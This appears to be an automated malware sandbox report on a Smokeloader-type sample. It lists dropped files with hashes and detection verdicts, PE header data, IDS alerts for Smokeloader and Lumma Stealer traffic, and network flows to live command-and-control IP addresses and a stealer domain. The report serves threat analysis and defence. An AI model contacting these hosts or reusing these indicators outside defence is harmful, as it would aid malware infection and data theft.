                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.2.3.6.0.6.1.5.4.0.5.1.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.2.3.6.0.6.2.0.8.7.3.8.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.4.c.4.d.6.d.-.e.e.b.9.-.4.3.6.4.-.b.b.a.a.-.6.5.7.7.c.1.b.8.2.9.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.f.9.1.9.4.3.-.d.a.1.3.-.4.b.a.c.-.8.f.0.b.-.7.4.a.0.a.8.4.9.9.b.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.1.A.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.8.-.0.0.0.1.-.0.0.1.4.-.2.4.0.4.-.b.5.d.f.b.b.a.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.9.b.4.f.b.9.d.f.8.3.f.f.0.2.c.6.a.8.d.c.b.7.9.4.2.a.5.b.6.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.2.1.A.E...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Sun May 26 22:27:41 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):53032
                                                          Entropy (8bit):2.831625542111079
                                                          Encrypted:false
                                                          SSDEEP:192:+NCJ/Xtgd6lHbOTB796YOymCFax0IIwfDhRZJsQoftVA91sIru0hrbPnhzn:kOgd6lCTBgYO6ax0IXfDhRP4YkIJtPhz
                                                          MD5:5EA8B1C76E9C7D656375CD44A0517BD7
                                                          SHA1:15F95A33ACD6A91990CF31C9C45C9D56C8651885
                                                          SHA-256:27B828147EF96CA68D9A3A589B2A55E140C53DF5177B41D7D3FE78FD8ADF6179
                                                          SHA-512:D16295A2DA1E30A878B63C05386133F7EF030D96BE18412A82B20BC719603453E5CA29392C72851EFEE78FFEBBE0B0C4D4AE8C4D0145A38C633C67609A9D94FA
                                                          Malicious:false
                                                          Preview:MDMP..a..... .......].Sf............4...............H........................1..........`.......8...........T...........@>.............. ..........|"..............................................................................eJ.......#......GenuineIntel............T...........H.Sf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8288
                                                          Entropy (8bit):3.6989082520976435
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJR06Zr6YEIJSUgIvgmfvgpDr89bsG0sfcycm:R6lXJy6F6YEmSUgogmfvhsGnfFp
                                                          MD5:82A0A69ADAA3DB57B13916B9A2164279
                                                          SHA1:E51F253A0B2DC013F873364B97E4F6CC20A4EA1A
                                                          SHA-256:C0279911DD7BFA5940044E9E05C4CD422813510168DADE0F5A23FF9E480DBAC7
                                                          SHA-512:0B15060CCCD00ED291CC8B2488252FF01BDCDEB437BC67479C43B4CB9AC6F3850E6B6519B31FAD6BC370D3550ECCD50A31F78ECF33E3A7C11AA5EBEEDFC95926
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.0.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4537
                                                          Entropy (8bit):4.4362787465144935
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsmJg77aI9+hWpW8VYaYm8M4JnUFlh+q8kgvTm1GXd:uIjf8I7Yw7ViJW+vT+GXd
                                                          MD5:ADDBD8F2175176073A63BCB6A84329A6
                                                          SHA1:D8590EE25361D64FC41C8692D78AB0E7A9D7D1A9
                                                          SHA-256:84B340C2E419F57F02F6F58459B14DB18154E5C830E5ABEFCE0C16773B92A32B
                                                          SHA-512:AEDD1F8D94B308C2ED75EE60073DE2153C759AA6005C0A088F8A3C9E4FC4E1D208EE9D9B86E9F6C41AD5F918AAA0203FFA19EBC583AFCEF2916934278D1C9C63
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="340650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2459136
                                                          Entropy (8bit):6.052474106868353
                                                          Encrypted:false
                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):685392
                                                          Entropy (8bit):6.872871740790978
                                                          Encrypted:false
                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.833616094889818
                                                          Encrypted:false
                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):450024
                                                          Entropy (8bit):6.673992339875127
                                                          Encrypted:false
                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                          Category:dropped
                                                          Size (bytes):35682
                                                          Entropy (8bit):5.380720750839877
                                                          Encrypted:false
                                                          SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2St:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxZ
                                                          MD5:C99F81FAE1C0223AAF80EC6FD2BC8060
                                                          SHA1:C2B39C1F2F65F61149FEA19312C7CC1BC9AD524B
                                                          SHA-256:499891242148F0890FC3E1BE28FB0C68676230BB331FB00681C86ABA9033BA6D
                                                          SHA-512:317C357EF1862755FD7BA32FAA02F2D3E1288C3DF56455D77A4360336A113044D36B8CB819F2D5F0C3BF9D983775FB020BFD12167755E0F95D81F08BBBE01F10
                                                          Malicious:false
                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):325120
                                                          Entropy (8bit):7.384635086921583
                                                          Encrypted:false
                                                          SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                          MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                          SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                          SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                          SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):2144768
                                                          Entropy (8bit):6.853125036254329
                                                          Encrypted:false
                                                          SSDEEP:49152:OePpQElJtTF+TxMoxc1TU+j+dAzGwlrh:OePpQEltIuoITsdZ
                                                          MD5:5DEB4442AE617600891949163BB52F0A
                                                          SHA1:8935E2C43020D691D195890D415F56C4F22C6355
                                                          SHA-256:ABED71D9D57551E20D1A3A1D5646940411C9D06B52E4DBFA66478DB903544BEC
                                                          SHA-512:A4933BC6802EE123BDFD64344BA3782D1DB49370222B03722A5C389ECFB3D264C30A64442E3227DE128B761BD168FF5E85D6813B561B37ACC2146AEF0D103EE4
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\Users\user\AppData\Local\Temp\C9A7.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):881664
                                                          Entropy (8bit):6.555251818096116
                                                          Encrypted:false
                                                          SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                          MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                          SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                          SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                          SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41369
                                                          Entropy (8bit):6.643664707313246
                                                          Encrypted:false
                                                          SSDEEP:768:yBQB1CTmqUQHXQkkU3NIZjKQu/MGQ2lsDBw7en:yBc0+yQmNIZreMp28O7Y
                                                          MD5:A93525F5F13C811E90C56492F5AC934A
                                                          SHA1:37FB7A8B8903F4B614CEC214F0FF0C69C88A1864
                                                          SHA-256:1B69A9C37210A79131C5CBCFAA4163FB5027989B4537B43A5A6CF6F40A4BAB1A
                                                          SHA-512:3D6267F5BA8FE3AEF759559D7358D6418EDAA927E9C6C5832CA4BB0703498DB6DC69F196715C14DFC727F3487A297C6201A5243BD1A762E3D5A1EB800EF13B3D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.643664707313246
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          File name:c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                                                          File size:41'369 bytes
                                                          MD5:a93525f5f13c811e90c56492f5ac934a
                                                          SHA1:37fb7a8b8903f4b614cec214f0ff0c69c88a1864
                                                          SHA256:1b69a9c37210a79131c5cbcfaa4163fb5027989b4537b43a5a6cf6f40a4bab1a
                                                          SHA512:3d6267f5ba8fe3aef759559d7358d6418edaa927e9c6c5832ca4bb0703498db6dc69f196715c14dfc727f3487a297c6201a5243bd1a762e3d5a1eb800ef13b3d
                                                          SSDEEP:768:yBQB1CTmqUQHXQkkU3NIZjKQu/MGQ2lsDBw7en:yBc0+yQmNIZreMp28O7Y
                                                          TLSH:F103D05A2292D462C7BC05F1CDC255BF6270F9C12A1A53B4C274EC7B3669FE353A482B
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x403343
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:
                                                          Time Stamp:0x664B35E9 [Mon May 20 11:37:13 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:1
                                                          OS Version Minor:0
                                                          File Version Major:1
                                                          File Version Minor:0
                                                          Subsystem Version Major:1
                                                          Subsystem Version Minor:0
                                                          Import Hash:
                                                          Instruction
                                                          call 00007F3CB539C8E5h
                                                          jne 00007F3CB539C8E7h
                                                          je 00007F3CB539C8E5h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9293 | 0x9400 | b90e33e08d86d940c0e1c5c796d65f12 | False | 0.7663904138513513 | data | 7.0432856719930195 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/24-00:27:15.022691 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49712 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:27:18.565315 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49715 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:27:54.236884 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49744 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:19.604016 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49775 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:22.060746 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49718 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:39.895797 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49778 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:25.797524 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49721 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:58.334389 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49781 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:16.965107 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49784 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:34.843315 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49787 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:29:52.939237 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49780 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:26.891612 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49723 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:47.866787 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49779 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:24.492005 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49719 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:27:14.005469 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49711 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:27:17.401783 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49714 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:06.967758 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49773 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:49.450238 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49737 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:27.743670 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49776 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:05.849413 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49782 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:24.792143 | UDP | 2052787 | ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) | 58021 | 53 | 192.168.2.5 | 1.1.1.1
05/27/24-00:30:42.022426 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49788 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:23.451714 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49785 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:19.578145 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49716 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:29:14.086645 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49774 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:27:16.337150 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49713 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:27:50.525998 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49739 | 80 | 192.168.2.5 | 187.143.58.5
05/27/24-00:30:11.305895 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49783 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:28.702005 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49786 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:47.787369 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49789 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:29:33.855725 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49777 | 80 | 192.168.2.5 | 186.112.12.192
05/27/24-00:30:56.387180 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49790 | 80 | 192.168.2.5 | 186.112.12.192
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          May 27, 2024 00:27:19.578145027 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.578180075 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:19.592189074 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:19.592199087 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.562275887 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.562289000 CEST8049716187.143.58.5192.168.2.5
                                                          May 27, 2024 00:27:20.562378883 CEST4971680192.168.2.5187.143.58.5
                                                          May 27, 2024 00:27:20.562551975 CEST4971680192.168.2.5187.143.58.5
